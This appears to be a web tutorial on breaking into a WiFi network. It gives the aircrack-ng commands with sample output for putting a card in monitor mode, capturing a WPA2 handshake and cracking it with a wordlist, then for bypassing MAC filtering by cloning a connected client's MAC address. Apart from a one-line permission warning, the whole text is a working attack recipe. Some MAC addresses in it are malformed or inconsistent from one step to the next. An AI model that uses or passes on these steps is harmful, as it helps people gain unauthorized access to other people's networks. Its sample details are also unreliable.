In this tutorial, we will learn how to hack into a WiFi network that has MAC filtering enabled. The Media Access Control (MAC) address is a 48-bit unique identifier assigned to all the network interfaces for their identification. Most routers provide a security option called MAC Filtering, also known as MAC Whitelist or Blacklist. This method allows the network administrator to specify MAC addresses that are allowed to connect or denied connection to the network. If it is enabled, only machines granted permission by MAC filtering will use a particular access point. So now that we know about MAC filtering, let's start with the tutorial.
WARNING: Don't try this on networks unless you have permission for penetration testing
CRACKING THE WIFI NETWORK
STEP 1: Downloading Kali Linux would be a better option as it will save time, and the user will not have to download and run all the tools separately. The user must also have a wireless card capable of monitoring.
STEP 2: Disconnect all wireless connections. Open the terminal and type in "airmon-ng start [your WLAN card name]." If you are not aware of the name of your WLAN card, open a separate tab in the terminal and type "ifconfig," and check the name there. All network adapters will be displayed there. It is usually "wlan0," so use that as the network card name.
STEP 3: Now type "airmon-ng start wlan0" and press Enter. It will print something like this:
"Found 6 processes that could cause trouble."
If airodump-ng, aireplay-ng, or airtun-ng stops working after a short time, you may want to "kill [PID]" some of them like:
PID NAME
661 NetworkManager
763 wpa_supplicant
1032 avahi-daemon
1036 avahi-daemon
10136 dhclient
10295 dhclientPHY Interface Driver Chipsetphy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N
6200 (rev 35) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
STEP 4: Our network card is now in a monitor state since the monitor is enabled on "wlan0mon". Now type "airodump-ng [monitor interface]" where the monitor interface is "wlan0mon" and press Enter.
STEP 5: Now type "airodump-ng wlan0mon" and press Enter.
If it gives an error like:
“ioctl(SIOCSIWMODE) failed: Device or resource busyARP linktype is set to 1 (Ethernet) - expected ARPHRDIEEE80211,ARPHRDIEEE80211FULL or ARPHRDIEEE80211_PRISM instead.”
Make sure RFMON is enabled, then run the command "airmon-ng start wlan0mon <#>". Go to Step 6 if you see something like:
"Sysfs injection support was not found either."
STEP 6: To fix that, use these commands and run the above command again.
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"
Now that you can see all WiFi networks in your range wait for your desired WiFi network to be shown. After that, hit Ctrl+C. It will look like this:
“CH 7 ][ Elapsed: 24 s ][ 2015-09-20 04:02 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:sB:25:4F:93:F3 -44 27 0 0 11 54 WPA2 CCMP PSK neibour 30:B9:21:FB:5E:DB -64 19 0 0 1 54e WPA CCMP PSK Hoes 58:3A:35:6A:60:31 -83 27 0 0 8 54e WPA2 CCMP PSK club 3A:6C:F5:4E:68:AB -87 9 0 0 1 54e. WPA2 CCMP PSK public”
Do not close or clear the terminal, as later we require some information from that screen.
STEP 7: Type “airodump-ng --bssid [mac of router] -c [channel ] --write [Output file name] [monitor interface]” and hit Enter. Get the MAC channel information of the target network from Step 5's "airodump-ng wlan0mon" output.
STEP 8: Next, to penetrate into the network, type “airodump-ng --bssid 1C:sB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon” and hit Enter. It will look like this:
“CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 1C:sB:25:4F:93:F3 -44 100 716 95 0 11 54 WPA2 CCMP PSK B BSSID STATION PWR Rate Lost Frames Probe 1C:sB:25:4F:93:F3 18:87:96:11:9B:A8 -30 1 -54 0 6 1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56 -67 18 - 1 0 48 1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E -68 1 -11 0 5 1C:sB:25:4F:93:F3 44:91:DB:A5:66:78 -81 11 - 1 0 30”
Now, we wait for the "handshake" text to appear on the terminal. Congrats! We now have password hashes and time to crack them. We will get passwords in plain text form, and we must use our best word list because everything depends on our word list. Do not close the terminal as we require some information from it.
STEP 9: Open a new terminal and hit Enter after typing "aircrack-ng [captured password hash file name] -w [word list]" i.e. aircrack-ng WPAcrack-01.cap -w wordlist.txt
Since the wordlist worked, we got the password. Now it's time to login to the WiFi. If we see this, it means MAC filtering is enabled:
“CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 2C:AB:25:4F:93:F3 -44 100 716 95 0 11 54 WPA2 CCMP PSK B”
BYPASSING MAC FILTERING
STEP 10: Navigate to the output of Step 8 "airodump-ng --bssid 10:AB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon" command, and we can see mac address mentioned under "STATION" like:
“BSSID STATION PWR Rate Lost Frames Probe 1C:sB:25:4F:93:F3 18:87:96:11:9B:A8 -30 1 -54 0 6 1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56 -67 18 - 1 0 48 1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E -68 1 -11 0 5 1C:sB:25:4F:93:F3 44:91:DB:A5:66:78 -81 11 - 1 0 30”
These are the MAC addresses of users connected to the network. These MAC addresses are allowed to connect to the network. If we have this MAC address, the MAC filter will not block us.
STEP 11: We have to clone the MAC address, so we will open the terminal and type the following commands:
"ifconfig wlan0 down"
"ifconfig wlan0 hw ether [desired mac adress]"
"ifconfig wlan0 up"
STEP 12: Next, we will choose one of the MAC addresses from under the station output that we got in Step 10 and type the following commands:
"ifconfig wlan0 down"
“ifconfig wlan0 hw ether 34:23:BA:28:B5:0E”
"ifconfig wlan0 up"
Also, we can type "ifconfig" to confirm that our MAC has changed. We have successfully connected to the WiFi network after bypassing its MAC filtering. Enjoy..!!
